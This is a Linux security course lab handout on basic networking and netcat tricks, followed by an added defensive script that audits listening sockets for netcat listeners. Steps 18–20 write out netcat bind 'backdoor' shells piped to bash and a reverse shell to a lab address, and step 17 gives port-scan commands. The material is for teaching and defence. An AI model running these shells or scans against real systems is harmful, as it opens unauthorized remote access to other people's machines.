Lab Exercise #4: Simple Network Review and Hacking

CIS 290 – LINUX Security

Lab Exercise #4: Simple network review and hacking

1. Install under LINUX – netcat, nmap, Wireshark, firewall and configuration tools.
2. Display all interfaces: ifconfig -a, ifconfig eth0 down, ifconfig eth0 up
3. Display interface physical attributes: ethtool eth0
4. ping gateway
5. traceroute csc.oakton.edu
6. netstat -rn
7. arp -a
8. telnet csc.oakton.edu
9. netstat -an
10. Review /etc/sysconfig/network-scripts
11. route print, netstat -rn

Stupid network tricks using TELNET, netcat, nmap:

12. Simple client/server

nc -l 1111
nc 127.0.0.1 1111
This is a test
This is a test.
Ending communication with ^C (Ctrl-C)

13. Simple file transfer

nc -l 1234 > test.out
echo 'Hi There!!!!!' | nc 127.0.0.1 1234

14. Client to web server

echo -e "GET http://www.oakton.edu HTTP/1.0\n\n\n\n" | nc -w 5 www.oakton.edu 80

15. Or getting a server header:

echo -e "HEAD / HTTP/1.0\n\n" | nc 10.0.2.100 80

16. Web Host

web.txt

Welcome to Bob's Webpage

Welcome to Bob's Webpage!!!!!!!!

cat web.txt | nc -l -v 80

Point browser to your system – http://127.0.0.1.

17. Port scanning:

nmap -sT -p 1-65535
nc -z 127.0.0.1 1-1024
echo "quit" | nc -z 127.0.0.1 1-1024
echo EXIT | nc -z -w 1 127.0.0.1 1-1024

18. TELNET client/server

nc -t -l 2323 | /bin/bash
nc 127.0.0.1 2323
echo "Hi there"
logout

19. “Backdoor” shell (-e option not in LINUX, note step 18 as bypass)

nc -e /bin/bash -l 2023
nc -v 127.0.0.1 2023

or telnet 127.0.0.1 2023

-e option not in LINUX

nc -l 2023 | /bin/bash

provides access to bash builtin commands (no external executables).

20. “Reverse” shell (-e option not in LINUX)

Local machine: nc -n -v -l -p 1234
Remote machine: nc -e /bin/sh 10.0.2.100 1234

21. Telnet to discovered ports: telnet
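The listeners opened in steps 12 through 20 all show up in the socket table, so the defender's counterpart to this lab is an audit of listening sockets. The script below is an added example, not part of the original handout; the allowlist, the function names and the sample `ss -ltnp` output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the lab handout): audit listening TCP sockets for
# netcat-style listeners and for ports outside an allowlist.

ALLOWED_PORTS="22 80 443"   # assumption: ports this host is meant to serve

# Constructed sample in `ss -ltnp` format; ports mirror the lab steps.
sample_ss() {
cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      1      0.0.0.0:2023       0.0.0.0:*         users:(("nc",pid=4310,fd=3))
LISTEN 0      1      0.0.0.0:1234       0.0.0.0:*         users:(("nc",pid=4311,fd=3))
LISTEN 0      1      0.0.0.0:80         0.0.0.0:*         users:(("nc",pid=4312,fd=3))
LISTEN 0      5      127.0.0.1:8000     0.0.0.0:*         users:(("python3",pid=5001,fd=4))
LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=812,fd=4))
EOF
}

# Reads `ss -ltnp` text on stdin; prints "<reason> <scope> <addr:port> <process>".
audit_listeners() {
  awk -v allowed="$ALLOWED_PORTS" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 != "LISTEN" { next }                      # skip header and other states
    {
      laddr = $4
      port = laddr; sub(/.*:/, "", port)         # after last colon, so [::]:22 -> 22
      proc = "unknown"                           # ss omits names without privileges
      if (match($0, /users:\(\("[^"]+"/))
        proc = substr($0, RSTART + 9, RLENGTH - 10)
      scope = (laddr ~ /^(127\.|\[::1\])/) ? "loopback" : "exposed"
      if (proc ~ /^(nc|ncat|netcat)(\..*)?$/)    # also nc.openbsd, nc.traditional
        reason = "NETCAT"                        # flagged even on an allowed port
      else if (!(port in ok))
        reason = "UNEXPECTED-PORT"
      else
        next
      print reason, scope, laddr, proc
    }'
}

# Demo on the sample; on a live host: ss -ltnp | audit_listeners
sample_ss | audit_listeners
```

The netcat listener on port 80 (step 16) is reported even though the port is on the allowlist, which is why the check looks at the owning process as well as the port number.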
